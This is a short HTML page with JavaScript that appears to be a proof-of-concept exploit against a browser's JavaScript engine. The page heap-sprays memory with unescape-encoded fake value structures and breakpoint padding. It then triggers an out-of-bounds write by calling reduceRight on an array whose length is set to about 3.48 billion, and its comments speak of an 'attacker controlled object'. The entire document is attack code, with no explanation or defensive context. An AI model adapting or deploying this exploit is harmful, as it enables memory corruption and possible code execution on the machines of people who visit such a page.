<html><script>
  function spray() {

      // Fake Value structures
      var z = unescape("%uffff%u0c0c%u0c0c%u0007");

      // Some padding
      var pad = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
      while (z.length <= 0x60000) {
          z += z;
      }

      for (var i = 0; i < 1100; i++) {
          eval("h" + i + " = new Object(); h" + i + ".test ='" + i + z + pad + "';");
      }
  }

  spray();

  xyz = new Array;
  xyz.length = 3484440000;

  a = function bleh(prev, current, index, array) {
    // Trigger a call to SetElem/setProperty on the attacker controlled object
    current[0] = 0x41424344;
  }

  xyz.reduceRight(a,1,2,3);
</script></html>

